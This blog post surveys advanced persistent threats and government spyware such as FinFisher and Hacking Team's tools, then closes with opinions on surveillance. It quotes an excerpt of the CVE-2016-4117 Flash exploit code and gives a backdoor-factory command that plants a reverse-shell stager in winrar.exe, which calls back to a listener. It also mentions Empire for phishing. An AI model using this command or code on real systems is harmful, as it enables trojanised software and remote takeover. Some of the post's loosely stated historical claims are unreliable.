We heard a technical terms named advanced persistent threat since 2013. An information which announced by cyber security company (kaspersky, FireEye, Symantec….etc) but not acknowledge by instigator . The story looks amazing that a security consulting firm (Mandiant) fooled by hacker. By coincidence, it found malicious finger print on gmail account and email message contained alleged resources came from China during investigation. This incident lets people in the world believe that cyber war will be happen in between country to country. A technical vocabulary so called Advanced Persistent Threat spreads around the world.
An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that above diagram can provide an idea to you in this regard.
Reference: – Unofficial information which did not acknowledge by instigator
APT 1: cyber espionage group based in China – Discovered on Feb 2013
APT 28: Russia’s Cyber Espionage Operations – Discovered on Oct 2014
whistle blower (Snowden) – surveillance program scandal ( PRISM ) – Discover on Jan 2014
The design objective of Advanced persistent threat:
Enabled espionage using a variety of intelligence gathering techniques to access sensitive information.
Government enforcement official tools
i. Da Vinci and Galileo
Made by the Italian company Hacking Team, use to Hijack Phones for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data.
Remark: An Official announcement in 2015 near year end, Da Vinci products not going to export to other countries due to data leakage incident happened on their campus.
ii. FinFisher (Neodymium & Promethium)
Specific users targeted in Europe and Turkey (last update on Dec 2016)
Neodymium uses the W32/Wingbird.A!dha backdoor to spy on users.
Promethium is a a “backdoor” program, it is a malware. He will masquerades as popular Windows tools such as WinUtils, TrueCrypt, WinRAR and SanDisk.
Remark: CVE-2016-4117 confusion code bug in Adobe Flash equivalent a instigator with Neodymium and Promethium. The Adobe Flash bug allow corrupt one of the objects to extend its length to 0xffffffff (see below source code) and its data buffer to address 0. The attacker are allow to access all of the user space memory once ByteArray corrupted. And such a way attacker execute embedded shellcode. If the Flash Player version is older than 21.0.0.196, the attack can’t execute.
public static function flash20(ba:Dtaa3, var4:uint, var5:uint)
{
var len:uint;
var flash50:uint;
try
{
flash38 = true;
flash21 = ba;
len = ba.length;
flash50 = (ba.a1 ^ ba.a5);
ba.a2 = 0xFFFFFFFF;
ba.a6 = (0XFFFFFFFF ^ flash50);
ba.endian = Endian.LITTLE_ENDIAN;
flash39 = var5;
len = ba.length;
if (len !=0xFFFFFFFF)
{
flash3("");
};
if (flash72)
{
Play3.flash20(); // Win32.Exec()
}
else
{
flash1("");
};
flash34(var5, var4);
}
Advanced Persistent Threat – Drawback of remote monitoring
Traditional Lawful Interception solutions face new challenges which highlight by Finfisher (see below)
- Data not transmitted over any network
- Encrypted Communications
- Targets in foreign countries
Finfisher resolution:
FinSpy was installed on several computer systems inside internet Cafes in critical areas in order to monitor them for suspicious activity, especially Skype communications to foreign individuals. Using the Webcam, pictures of the targets were taken while they were using the system
Traditional tactical or strategic Interception solutions face challenges which point out by Finfisher (see below):
- Data not transmitted over any network and kept on the device
- Encrypted Communications in the Air-Interface, which
- avoid the usage of tactical active or passive Off-Air Systems
- End-to-end encryption from the device such as Messengers,
- Emails or PIN messages
Finfisher resolution:
FinSpy Mobile was deployed on BlackBerry mobile phones of several Targets to monitor all communications, including SMS/MMS, Email and BlackBerry Messenger.
The official spy tools looks powerful, however there is another sniff technique which available in the IT world.
Implant backdoor example:
Not going to teach how to hack the system but it is a better understanding …………..
This session not going to get in touch with FinFisher backdoor. However few available solution in the market guide you implant a backdoor to Winrar.exe. One of the example display as below:
sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080
Government enforcement agency looks not difficult to expand the APT area of coverage. A lot of time they are relies on phishing.
Concept wise equivalent to government enforcement tool
The objective of the APT intend to collect sensitive data or voice messages during surveillance program process. And therefore the compatibility of the malware become an important factor. We are not a government agency but we can run a test with similar concept of design.
Phishing with Empire – Empire software supports macOS, Linux, and Windows hosts from one listener. The only requirement is that you need find a Command and Control (C2) work with you.
Summary:
The key words advanced persistence threat sound scary however it is only a surveillance program. As a normal citizen I do not believe foreign country have interest on my telephone conversation. From data privacy, it looks that it contained grey area since we do not know the reason why we are under surveillance. Such action let people nervous. However my expectation on these technology is that it must expand to some area in the city which take care the monitor and control of criminal activities. What do you think?
